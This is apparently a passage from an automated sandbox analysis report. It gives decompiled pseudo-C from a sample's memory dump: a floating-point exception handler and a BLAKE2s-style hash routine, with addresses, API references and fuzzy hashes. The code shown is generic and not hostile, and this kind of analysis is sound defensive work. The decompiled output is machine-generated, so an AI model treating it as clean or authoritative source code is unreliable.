				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E00C5DFB6(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E00C5DF1C(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























                                            0x00c60662
                                            0x00c60669
                                            0x00c6066e
                                            0x00c60674
                                            0x00c60677
                                            0x00c6067d
                                            0x00c60682
                                            0x00c60687
                                            0x00c60687
                                            0x00c6068d
                                            0x00c60692
                                            0x00c60697
                                            0x00c60697
                                            0x00c6069e
                                            0x00c606a3
                                            0x00c606a8
                                            0x00c606a8
                                            0x00c606af
                                            0x00c606b4
                                            0x00c606b9
                                            0x00c606b9
                                            0x00c606c0
                                            0x00c606c5
                                            0x00c606ca
                                            0x00c606ca
                                            0x00c606d2
                                            0x00c606e2
                                            0x00c606f4
                                            0x00c60706
                                            0x00c60719
                                            0x00c6072b
                                            0x00c60733
                                            0x00c60738
                                            0x00c6073d
                                            0x00c6073d
                                            0x00c60744
                                            0x00c60749
                                            0x00c60749
                                            0x00c60750
                                            0x00c60755
                                            0x00c60755
                                            0x00c6075c
                                            0x00c60761
                                            0x00c60761
                                            0x00c60768
                                            0x00c6076d
                                            0x00c6076d
                                            0x00c60777
                                            0x00c60779
                                            0x00c607b3
                                            0x00c6077b
                                            0x00c60780
                                            0x00c607a4
                                            0x00c607ac
                                            0x00c607a0
                                            0x00c607a0
                                            0x00c607b6
                                            0x00c607bd
                                            0x00c607bf
                                            0x00c607e1
                                            0x00c607e9
                                            0x00c607ec
                                            0x00c607ec
                                            0x00c607ee
                                            0x00c607ee
                                            0x00c607f9
                                            0x00c607ff
                                            0x00c60804
                                            0x00c6080b
                                            0x00c60845
                                            0x00c60850
                                            0x00c60856
                                            0x00c60859
                                            0x00c6085c
                                            0x00c60868
                                            0x00c60870
                                            0x00c6080d
                                            0x00c60810
                                            0x00c6081c
                                            0x00c60822
                                            0x00c60828
                                            0x00c6082b
                                            0x00c60834
                                            0x00c60834
                                            0x00c60873
                                            0x00c60881
                                            0x00c60887
                                            0x00c6088e
                                            0x00c60890
                                            0x00c60890
                                            0x00c60897
                                            0x00c60899
                                            0x00c60899
                                            0x00c608a0
                                            0x00c608a2
                                            0x00c608a2
                                            0x00c608a9
                                            0x00c608ab
                                            0x00c608ab
                                            0x00c608b2
                                            0x00c608b4
                                            0x00c608b4
                                            0x00c608c1
                                            0x00c608c4
                                            0x00c608fb
                                            0x00c608c6
                                            0x00c608c6
                                            0x00c608c9
                                            0x00c608f4
                                            0x00c608e9
                                            0x00c608e9
                                            0x00c608fd
                                            0x00c60905
                                            0x00c60908
                                            0x00c60927
                                            0x00c6092c
                                            0x00c6092c
                                            0x00c6092e
                                            0x00c60933
                                            0x00c6093f
                                            0x00c60935
                                            0x00c60938
                                            0x00c60938
                                            0x00c60944
                                            0x00c60944
                                            0x00c6090a
                                            0x00c6090d
                                            0x00c6091c
                                            0x00000000
                                            0x00c6091c
                                            0x00c6090f
                                            0x00c60912
                                            0x00c60914
                                            0x00c60914
                                            0x00000000
                                            0x00c60912
                                            0x00c608cb
                                            0x00c608ce
                                            0x00c608e4
                                            0x00000000
                                            0x00c608e4
                                            0x00c608d3
                                            0x00c608d5
                                            0x00c608d5
                                            0x00c608d3
                                            0x00000000
                                            0x00c608c4
                                            0x00c607c6
                                            0x00c607d4
                                            0x00c607dc
                                            0x00000000
                                            0x00c607dc
                                            0x00c607ca
                                            0x00c607cf
                                            0x00c607cf
                                            0x00000000
                                            0x00c607ca
                                            0x00c60787
                                            0x00c60795
                                            0x00c6079d
                                            0x00000000
                                            0x00c6079d
                                            0x00c6078b
                                            0x00c60790
                                            0x00c60790
                                            0x00c6078b

                                            APIs
                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C6064F,?,?,00000008,?,?,00C602EF,00000000), ref: 00C60881
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ExceptionRaise
                                            • String ID:
                                            • API String ID: 3997070919-0
                                            • Opcode ID: 085f392e7cdb880989871702afa0e6a1cb3d80ac5bffd8de122c3dea9a7c681b
                                            • Instruction ID: e360a2f9bde015db46d02e5915d7e027b44c95a748613a6ebec0ba520ba1c445
                                            • Opcode Fuzzy Hash: 085f392e7cdb880989871702afa0e6a1cb3d80ac5bffd8de122c3dea9a7c681b
                                            • Instruction Fuzzy Hash: D9B14C355106089FD729CF28C4C6B667BE0FF45364F258658E9A9DF2E2C335EA91CB40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C33EAD, Relevance: 1.6, Strings: 1, Instructions: 332COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 81%
                                            			E00C33EAD() {
				void* _t230;
				signed int* _t231;
				intOrPtr _t240;
				signed int _t245;
				intOrPtr _t246;
				signed int _t257;
				intOrPtr _t258;
				signed int _t269;
				intOrPtr _t270;
				signed int _t275;
				signed int _t280;
				signed int _t285;
				signed int _t290;
				signed int _t295;
				intOrPtr _t296;
				signed int _t301;
				intOrPtr _t302;
				signed int _t307;
				intOrPtr _t308;
				signed int _t313;
				intOrPtr _t314;
				signed int _t319;
				signed int _t324;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				intOrPtr _t376;
				intOrPtr _t377;
				signed int _t379;
				signed int _t381;
				intOrPtr _t383;
				signed int _t385;
				signed int _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				intOrPtr _t396;
				signed int _t398;
				intOrPtr _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				signed int _t414;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				intOrPtr _t431;
				signed int _t433;
				intOrPtr _t434;
				void* _t435;
				void* _t436;
				void* _t437;

				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
				_t342 = 0x10;
				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
				_t436 = _t435 + 0xc;
				_push(8);
				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
				_t437 = _t436 + 0xc;
				_t418 =  *_t230 ^ 0x510e527f;
				_t231 =  *(_t377 + 0xfc);
				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
				_t334 =  *(_t437 + 0x64);
				 *(_t437 + 0x28) = 0x6a09e667;
				 *(_t437 + 0x30) = 0xbb67ae85;
				_t379 =  *_t231 ^ 0x1f83d9ab;
				_t348 =  *(_t437 + 0x5c);
				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
				 *(_t437 + 0x38) =  *(_t437 + 0x54);
				 *(_t437 + 0x20) =  *(_t437 + 0x50);
				 *((intOrPtr*)(_t437 + 0x10)) = 0;
				 *((intOrPtr*)(_t437 + 0x48)) = 0;
				_t427 =  *(_t437 + 0x44);
				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
				_t240 =  *((intOrPtr*)(_t437 + 0x10));
				 *(_t437 + 0x24) = 0xa54ff53a;
				 *(_t437 + 0x40) = _t334;
				 *(_t437 + 0x34) = _t348;
				do {
					_t37 = _t240 + 0xc623b0; // 0x3020100
					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
					 *(_t437 + 0x14) = _t350;
					_t351 = _t350 ^ _t418;
					asm("rol ecx, 0x10");
					_t245 =  *(_t437 + 0x28) + _t351;
					_t420 =  *(_t437 + 0x34) ^ _t245;
					 *(_t437 + 0x28) = _t245;
					_t246 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror esi, 0xc");
					 *(_t437 + 0x34) = _t420;
					_t48 = _t246 + 0xc623b1; // 0x4030201
					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
					 *(_t437 + 0x14) = _t422;
					_t423 = _t422 ^ _t351;
					asm("ror esi, 0x8");
					_t353 =  *(_t437 + 0x28) + _t423;
					 *(_t437 + 0x28) = _t353;
					asm("ror eax, 0x7");
					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0xc623b2; // 0x5040302
					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x20) = _t355;
					_t356 = _t355 ^ _t407;
					asm("rol ecx, 0x10");
					_t257 =  *(_t437 + 0x30) + _t356;
					_t409 =  *(_t437 + 0x1c) ^ _t257;
					 *(_t437 + 0x30) = _t257;
					_t258 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edi, 0xc");
					 *(_t437 + 0x1c) = _t409;
					_t71 = _t258 + 0xc623b3; // 0x6050403
					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
					 *(_t437 + 0x20) = _t411;
					_t412 = _t411 ^ _t356;
					asm("ror edi, 0x8");
					_t358 =  *(_t437 + 0x30) + _t412;
					 *(_t437 + 0x30) = _t358;
					asm("ror eax, 0x7");
					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0xc623b4; // 0x7060504
					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
					_t360 = _t336 ^ _t379;
					asm("rol ecx, 0x10");
					_t269 =  *(_t437 + 0x18) + _t360;
					_t381 =  *(_t437 + 0x40) ^ _t269;
					 *(_t437 + 0x18) = _t269;
					_t270 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t91 = _t270 + 0xc623b5; // 0x8070605
					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
					 *(_t437 + 0x38) = _t337;
					_t338 = _t337 ^ _t360;
					asm("ror ebx, 0x8");
					_t275 =  *(_t437 + 0x18) + _t338;
					 *(_t437 + 0x18) = _t275;
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t381 ^ _t275;
					_t383 =  *((intOrPtr*)(_t437 + 0x10));
					_t101 = _t383 + 0xc623b6; // 0x9080706
					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
					 *(_t437 + 0x2c) = _t362;
					_t363 = _t362 ^ _t427;
					asm("rol ecx, 0x10");
					_t280 =  *(_t437 + 0x24) + _t363;
					_t429 =  *(_t437 + 0x3c) ^ _t280;
					 *(_t437 + 0x24) = _t280;
					_t110 = _t383 + 0xc623b7; // 0xa090807
					asm("ror ebp, 0xc");
					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
					 *(_t437 + 0x2c) = _t385;
					_t386 = _t385 ^ _t363;
					asm("ror edx, 0x8");
					_t285 =  *(_t437 + 0x24) + _t386;
					 *(_t437 + 0x24) = _t285;
					asm("ror ebp, 0x7");
					 *(_t437 + 0x3c) = _t429 ^ _t285;
					_t431 =  *((intOrPtr*)(_t437 + 0x10));
					_t121 = _t431 + 0xc623b8; // 0xb0a0908
					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x14) = _t365;
					_t366 = _t365 ^ _t386;
					asm("rol ecx, 0x10");
					_t290 =  *(_t437 + 0x18) + _t366;
					_t388 =  *(_t437 + 0x1c) ^ _t290;
					 *(_t437 + 0x18) = _t290;
					_t130 = _t431 + 0xc623b9; // 0xc0b0a09
					asm("ror edx, 0xc");
					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
					 *(_t437 + 0x14) = _t433;
					 *(_t437 + 0x4c) = _t433;
					_t427 = _t433 ^ _t366;
					asm("ror ebp, 0x8");
					_t295 =  *(_t437 + 0x18) + _t427;
					_t389 = _t388 ^ _t295;
					 *(_t437 + 0x18) = _t295;
					 *(_t437 + 0x74) = _t295;
					_t296 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x1c) = _t389;
					 *(_t437 + 0x60) = _t389;
					_t144 = _t296 + 0xc623ba; // 0xd0c0b0a
					_t390 =  *(_t437 + 0x40);
					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
					 *(_t437 + 0x20) = _t368;
					_t369 = _t368 ^ _t423;
					asm("rol ecx, 0x10");
					_t301 =  *(_t437 + 0x24) + _t369;
					_t391 = _t390 ^ _t301;
					 *(_t437 + 0x24) = _t301;
					_t302 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t154 = _t302 + 0xc623bb; // 0xe0d0c0b
					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
					 *(_t437 + 0x20) = _t425;
					 *(_t437 + 0x50) = _t425;
					_t418 = _t425 ^ _t369;
					asm("ror esi, 0x8");
					_t307 =  *(_t437 + 0x24) + _t418;
					_t392 = _t391 ^ _t307;
					 *(_t437 + 0x24) = _t307;
					 *(_t437 + 0x78) = _t307;
					_t308 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t392;
					 *(_t437 + 0x64) = _t392;
					_t167 = _t308 + 0xc623bc; // 0xf0e0d0c
					_t393 =  *(_t437 + 0x3c);
					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
					 *(_t437 + 0x38) = _t371;
					_t372 = _t371 ^ _t412;
					asm("rol ecx, 0x10");
					_t313 =  *(_t437 + 0x28) + _t372;
					_t394 = _t393 ^ _t313;
					 *(_t437 + 0x28) = _t313;
					_t314 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t177 = _t314 + 0xc623bd; // 0xe0f0e0d
					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
					 *(_t437 + 0x38) = _t414;
					 *(_t437 + 0x54) = _t414;
					_t407 = _t414 ^ _t372;
					asm("ror edi, 0x8");
					_t319 =  *(_t437 + 0x28) + _t407;
					_t395 = _t394 ^ _t319;
					 *(_t437 + 0x28) = _t319;
					asm("ror edx, 0x7");
					 *(_t437 + 0x3c) = _t395;
					 *(_t437 + 0x68) = _t395;
					_t396 =  *((intOrPtr*)(_t437 + 0x10));
					 *(_t437 + 0x6c) = _t319;
					_t190 = _t396 + 0xc623be; // 0xa0e0f0e
					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
					 *(_t437 + 0x2c) = _t374;
					_t375 = _t374 ^ _t338;
					asm("rol ecx, 0x10");
					_t324 =  *(_t437 + 0x30) + _t375;
					_t340 =  *(_t437 + 0x34) ^ _t324;
					 *(_t437 + 0x30) = _t324;
					_t199 = _t396 + 0xc623bf; // 0x40a0e0f
					asm("ror ebx, 0xc");
					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
					 *(_t437 + 0x2c) = _t398;
					 *(_t437 + 0x58) = _t398;
					_t379 = _t398 ^ _t375;
					asm("ror edx, 0x8");
					_t329 =  *(_t437 + 0x30) + _t379;
					_t341 = _t340 ^ _t329;
					 *(_t437 + 0x30) = _t329;
					 *(_t437 + 0x70) = _t329;
					asm("ror ebx, 0x7");
					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
					 *(_t437 + 0x34) = _t341;
					_t348 =  *(_t437 + 0x34);
					 *(_t437 + 0x5c) = _t341;
					_t334 =  *(_t437 + 0x40);
					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
				} while (_t240 <= 0x90);
				 *(_t437 + 0x84) = _t379;
				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
				 *(_t437 + 0x88) = _t427;
				_t434 =  *((intOrPtr*)(_t437 + 0x48));
				 *(_t437 + 0x7c) = _t418;
				 *(_t437 + 0x80) = _t407;
				do {
					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
					 *(_t376 + _t434) = _t333;
					_t434 = _t434 + 4;
				} while (_t434 < 0x20);
				return _t333;
			}

























































































                                            0x00c33eb3
                                            0x00c33ecd
                                            0x00c33ed5
                                            0x00c33edd
                                            0x00c33edd
                                            0x00c33ee9
                                            0x00c33eec
                                            0x00c33eec
                                            0x00c33ef8
                                            0x00c33efe
                                            0x00c33f04
                                            0x00c33f0a
                                            0x00c33f0e
                                            0x00c33f17
                                            0x00c33f20
                                            0x00c33f26
                                            0x00c33f2f
                                            0x00c33f39
                                            0x00c33f41
                                            0x00c33f49
                                            0x00c33f51
                                            0x00c33f59
                                            0x00c33f61
                                            0x00c33f65
                                            0x00c33f69
                                            0x00c33f6d
                                            0x00c33f71
                                            0x00c33f75
                                            0x00c33f7d
                                            0x00c33f81
                                            0x00c33f85
                                            0x00c33f85
                                            0x00c33f99
                                            0x00c33f9f
                                            0x00c33fa3
                                            0x00c33fa9
                                            0x00c33fac
                                            0x00c33fae
                                            0x00c33fb0
                                            0x00c33fb4
                                            0x00c33fb8
                                            0x00c33fbb
                                            0x00c33fbf
                                            0x00c33fd3
                                            0x00c33fd9
                                            0x00c33fdd
                                            0x00c33fe3
                                            0x00c33fe6
                                            0x00c33fea
                                            0x00c33fee
                                            0x00c33ff1
                                            0x00c33ffd
                                            0x00c3400f
                                            0x00c34015
                                            0x00c34019
                                            0x00c3401f
                                            0x00c34022
                                            0x00c34024
                                            0x00c34026
                                            0x00c3402a
                                            0x00c3402e
                                            0x00c34031
                                            0x00c34035
                                            0x00c34049
                                            0x00c3404f
                                            0x00c34053
                                            0x00c34059
                                            0x00c3405c
                                            0x00c34060
                                            0x00c34064
                                            0x00c34067
                                            0x00c3406f
                                            0x00c34083
                                            0x00c3408b
                                            0x00c34091
                                            0x00c34094
                                            0x00c34096
                                            0x00c34098
                                            0x00c3409c
                                            0x00c340a0
                                            0x00c340a3
                                            0x00c340b3
                                            0x00c340b9
                                            0x00c340bd
                                            0x00c340c3
                                            0x00c340c6
                                            0x00c340ca
                                            0x00c340ce
                                            0x00c340d1
                                            0x00c340d5
                                            0x00c340d9
                                            0x00c340eb
                                            0x00c340f1
                                            0x00c340f5
                                            0x00c340fb
                                            0x00c340fe
                                            0x00c34100
                                            0x00c34102
                                            0x00c34106
                                            0x00c34111
                                            0x00c3411d
                                            0x00c34123
                                            0x00c34127
                                            0x00c3412d
                                            0x00c34130
                                            0x00c34134
                                            0x00c34138
                                            0x00c3413b
                                            0x00c3413f
                                            0x00c34143
                                            0x00c34155
                                            0x00c3415b
                                            0x00c3415f
                                            0x00c34165
                                            0x00c34168
                                            0x00c3416a
                                            0x00c3416c
                                            0x00c34170
                                            0x00c3417b
                                            0x00c34187
                                            0x00c3418d
                                            0x00c34191
                                            0x00c34195
                                            0x00c3419b
                                            0x00c3419e
                                            0x00c341a0
                                            0x00c341a2
                                            0x00c341a6
                                            0x00c341aa
                                            0x00c341ae
                                            0x00c341b1
                                            0x00c341b5
                                            0x00c341b9
                                            0x00c341c0
                                            0x00c341cd
                                            0x00c341cf
                                            0x00c341d3
                                            0x00c341dd
                                            0x00c341e0
                                            0x00c341e2
                                            0x00c341e4
                                            0x00c341e8
                                            0x00c341ec
                                            0x00c341ef
                                            0x00c341ff
                                            0x00c34205
                                            0x00c34209
                                            0x00c3420d
                                            0x00c34213
                                            0x00c34216
                                            0x00c34218
                                            0x00c3421a
                                            0x00c3421e
                                            0x00c34222
                                            0x00c34226
                                            0x00c34229
                                            0x00c3422d
                                            0x00c34231
                                            0x00c34238
                                            0x00c34245
                                            0x00c3424b
                                            0x00c3424f
                                            0x00c34255
                                            0x00c34258
                                            0x00c3425a
                                            0x00c3425c
                                            0x00c34260
                                            0x00c34264
                                            0x00c34267
                                            0x00c34277
                                            0x00c3427d
                                            0x00c34281
                                            0x00c34285
                                            0x00c3428b
                                            0x00c3428e
                                            0x00c34290
                                            0x00c34292
                                            0x00c34296
                                            0x00c34299
                                            0x00c3429d
                                            0x00c342a1
                                            0x00c342a5
                                            0x00c342a9
                                            0x00c342bb
                                            0x00c342c1
                                            0x00c342c5
                                            0x00c342cb
                                            0x00c342ce
                                            0x00c342d0
                                            0x00c342d2
                                            0x00c342d6
                                            0x00c342e1
                                            0x00c342ed
                                            0x00c342ef
                                            0x00c342f3
                                            0x00c342f7
                                            0x00c342f9
                                            0x00c34300
                                            0x00c34302
                                            0x00c34304
                                            0x00c34308
                                            0x00c34310
                                            0x00c34313
                                            0x00c34316
                                            0x00c3431a
                                            0x00c3431e
                                            0x00c34322
                                            0x00c34326
                                            0x00c3432a
                                            0x00c34335
                                            0x00c3433c
                                            0x00c34343
                                            0x00c3434a
                                            0x00c3434e
                                            0x00c34352
                                            0x00c34359
                                            0x00c34359
                                            0x00c34366
                                            0x00c3436a
                                            0x00c3436d
                                            0x00c34370
                                            0x00c3437f

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID: gj
                                            • API String ID: 0-4203073231
